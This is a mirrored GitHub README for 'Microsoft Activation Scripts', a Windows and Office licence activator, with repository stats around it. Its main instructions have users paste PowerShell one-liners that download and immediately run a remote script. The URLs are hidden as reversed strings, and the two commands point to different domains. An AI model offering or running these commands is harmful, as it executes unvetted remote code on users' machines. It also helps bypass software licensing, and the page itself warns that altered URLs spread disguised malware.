Star 历史趋势
数据来源: GitHub API · 生成自 Stargazers.cn
README.md

MAS Logo

Microsoft Activation Scripts (MAS)

Open-source Windows and Office activator featuring HWID, Ohook, TSforge, and Online KMS activation methods, along with advanced troubleshooting.


How to Activate Windows / Office / Extended Security Updates (ESU)?

Method 1 - PowerShell ❤️

  1. Click the Start Menu, type PowerShell, and open it.

  2. Copy and paste the code below and press Enter.

    • For Windows 8.1, 10 and 11:
      iex(irm(-join"dfc.mrtig//:sptth"[-1..-99]))
      
      If the above is blocked (by ISP/DNS), try this (needs updated Windows 10 or 11):
      iex (curl.exe -s --doh-url https://1.1.1.1/dns-query (-join"niw.detavitca.teg//:sptth"[-1..-99]) | Out-String)
      
  3. In the menu that appears, type the number corresponding to one of the Green options.


[!TIP]

[!NOTE]

  • The irm command in PowerShell downloads a script from a specified URL, and the iex command executes it.
  • Always double-check the URL before executing the command and verify the source is trustworthy when manually downloading files.
  • Be cautious of third parties spreading malware disguised as MAS by altering the URL in the PowerShell command.

Latest Version: 3.12
Release date: 04-Jul-2026

关于 About

Open-source Windows and Office activator featuring HWID, Ohook, TSforge, and Online KMS activation methods, along with advanced troubleshooting.
activatormassgravemassgravelmicrosoftmicrosoft365officeoffice365ohookpowershellwindowswindows-10windows-11

语言 Languages

提交活跃度 Commit Activity

代码提交热力图
过去 52 周的开发活跃度
1
Total Commits
峰值: 1次/周
Less
More

核心贡献者 Contributors